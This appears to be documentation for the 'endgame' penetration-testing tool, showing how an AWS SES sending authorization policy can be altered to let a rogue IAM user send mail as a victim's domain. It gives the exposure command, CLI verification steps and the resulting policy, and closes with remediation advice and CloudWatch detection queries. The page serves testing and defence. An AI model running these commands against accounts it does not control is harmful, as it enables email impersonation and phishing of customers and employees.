SES Sender Authorization Policies

• Steps to Reproduce
• Exploitation
• Remediation
• Basic Detection
• References

SES Sending Authorization Policies can be used to add a rogue IAM user as a Delegate sender. This can result in a malicous user sending an email on behalf of your organization, which could lead to phishing attacks against customers or employees, as well as a loss of consumer trust and reputation loss.

How it works

Sending authorization is based on sending authorization policies. If you want to enable a delegate sender to send on your behalf, you create a sending authorization policy and associate the policy to your identity by using the Amazon SES console or the Amazon SES API.

When Amazon SES receives the request to send the email, it checks your identity's policy (if present) to determine if you have authorized the delegate sender to send on the identity's behalf. If the delegate sender is authorized, Amazon SES accepts the email.

This can be abused by adding a rogue user as a Delegate sender.

Steps to Reproduce

• To expose the resource using endgame, run the following from the victim account:

export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil

endgame expose --service ses --name test-resource-exposure.com

• To verify that the sender authorization policy has been set to allow actions from the rogue user, run the following command from the victim account:

aws ses list-identity-policies --identity test-resource-exposure.com

The command above will return the following:

{
    "PolicyNames": [
        "Endgame"
    ]
}

• Take the response from the command above - Endgame - and list the policy name in the command below

aws ses get-identity-policies --identity test-resource-exposure.com --policy-names "Endgame"

• Observe that the contents match the example shown below

Example

The policy below allows the Evil Principal (arn:aws:iam::999988887777:user/evil access to ses:* to the victim resource (arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com), indicating a successful compromise.

{
    "Policies": {
        "Endgame": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"ses:*\",\"Resource\":\"arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:user/evil\"},\"Action\":\"ses:*\",\"Resource\":\"arn:aws:ses:us-east-1:111122223333:identity/test-resource-exposure.com\"}]}"
    }
}

Exploitation

Remediation

‼️ Note: At the time of this writing, AWS Access Analyzer does NOT support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool.

• Trusted Accounts Only: Ensure that SES Authorization Policies only authorize specific delegate senders according to your design.
• Ensure access is necessary: For any delegate senders that do have access, ensure that the access is absolutely necessary.
• Restrict access to IAM permissions that could lead to manipulation of your SES Sender Authorization Policies: Tightly control access to the following IAM actions:
  • ses:PutIdentityPolicy: Adds or updates a sending authorization policy for the specified identity (an email address or a domain)
  • ses:DeleteIdentityPolicy: Deletes the policy associated with the identity
  • ses:GetIdentityPolicies: Returns the requested sending authorization policies for the given identity (an email address or a domain)
  • ses:ListIdentities: _Returns a list containing all of the identities (email addresses and domains) for your AWS account, regardless of verification status _
  • ses:ListIdentityPolicies: Returns a list of sending authorization policies that are attached to the given identity (an email address or a domain)

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here

Basic Detection

The following CloudWatch Log Insights query will include exposure actions taken by endgame:

fields eventTime, eventSource, eventName, userIdentity.arn, userAgent 
| filter eventSource='ses.amazonaws.com' AND (eventName='PutIdentityPolicy' or eventName='DeleteIdentityPolicy')

The following query detects policy modifications which include the default IOC string:

fields eventTime, eventSource, eventName, userIdentity.arn, userAgent 
| filter eventSource='ses.amazonaws.com' AND (eventName='PutIdentityPolicy' and requestParameters.policyName='Endgame')

This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.

References

• put-identity-policy

• Sending Authorization Overview

• Sending Authorization Policy Examples

• Delegate sender